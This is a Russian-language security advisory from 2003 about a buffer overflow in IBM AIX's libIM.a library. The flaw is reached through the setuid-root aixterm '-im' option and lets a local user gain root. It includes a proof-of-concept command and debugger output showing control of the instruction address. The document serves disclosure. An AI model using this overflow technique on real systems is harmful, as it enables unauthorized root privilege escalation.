Security Lab

Переполнение буфера в IBM AIX.

Дата публикации:18.02.2003
Всего просмотров:1090
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: Переполнение буфера обнаружено в libIM.a National Language Support system библиотеке в операционной системе IBM's AIX. Локальный пользователь может получить поднятые привилегии на системе, включая root привилегии.

Локальный пользователь может вызвать '/usr/lpp/X11/bin/aixterm' с '-im' опцией командной строки и специально обработанным параметром команды, чтобы эксплуатировать обнаруженный недостаток и выполнить произвольный код с root привилегиями. Пример:

ls -la /usr/lpp/X11/bin/aixterm
- -rwsr-xr-x   1 root     system    376384 Mar 18 2001 
/usr/lpp/X11/bin/aixterm*
$ cp -p /usr/lpp/X11/bin/aixterm test
$ ./test -im `perl -e'print"A"x47;print pack("l",0x11223344)'`
1363-009  aixterm: Cannot open font -dt-interface
user-medium-r-normal-l*-*-*-*-*-*-*-*-*.
        Check path name and permissions.
1363-009  aixterm: Cannot open font
- -*-roman-medium-r-normal--8-50-100-100-c-*-ISO8859-1.
        Check path name and permissions.
Illegal instruction (core dumped)
$ dbx ./test core
Type 'help' for help.
reading symbolic information ...warning: no source compiled with -g

[using memory image in core]
warning: Unable to access address 0x41414149 from core

Illegal instruction (reserved addressing fault) in . at 0x11223344 ($t1)
warning: Unable to access address 0x11223344 from core 0x11223344 (???)
warning: Unable to access address 
0x11223344 from core ffffffff   warning: Unable to access address
0x11223344 from core fnmadd.   
fr31,fr31,fr31,fr31 (dbx)
Уязвимость обнаружена в IBM AIX 4.3, 5.1, 5.2
Ссылки: iDEFENSE Security Advisory 02.12.03: Buffer Overflow in AIX libIM.a